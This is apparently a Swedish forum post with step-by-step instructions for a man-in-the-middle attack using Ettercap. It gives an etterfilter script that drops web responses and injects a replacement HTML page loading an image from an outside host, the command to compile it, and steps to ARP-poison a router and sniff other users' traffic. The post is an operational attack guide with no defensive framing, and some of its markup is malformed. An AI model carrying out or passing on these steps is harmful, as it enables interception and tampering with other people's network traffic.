1. ladda ner ettercap
2. gå dit du installera det
3. skapa "haksfilter.txt" (i C:\Program\EttercapNG)
CODE
if (ip.proto == TCP && tcp.src == 80 && search(DATA.data, "text/html"))
{
drop();
inject("./filtercontent.txt");
msg("injecting...\n");
}
4. skapa "filtercontent.txt"
CODE
HTTP/1x200 OK
Content-type: text/html
<html>
<head><title>Dumoflum</title></head>
<body><center><h3>Dumoflum</h3><p><img src="http://0wn3d.dk/owned/owned-fishy.jpg"</p>
<div style=visibility: hidden; position: absolute; left: -999999px;">
5. gå in i cmd och bläddra till "ettercap mappen"
6. skriv "c:\Program\ettercap\etterfilter haksfilter.txt -o replace.ef ((kompilerar))
7.1 starta ettercap/bocka av "promisc mode" under options
7.2 unified sniffning under "sniff"
7.3 välj scan for host under "host"
7.4 host list under "host"
7.5 adda routern till "add to target 1" sen kan du välja många om du vill till "add to target 2"
8. load filter under "filters"
9. ladda replace.ef
10.Arp poisoning under "mitm" välj sedan "sniff remote connetions"
11. start sniffing
hoppas det blev rätt nu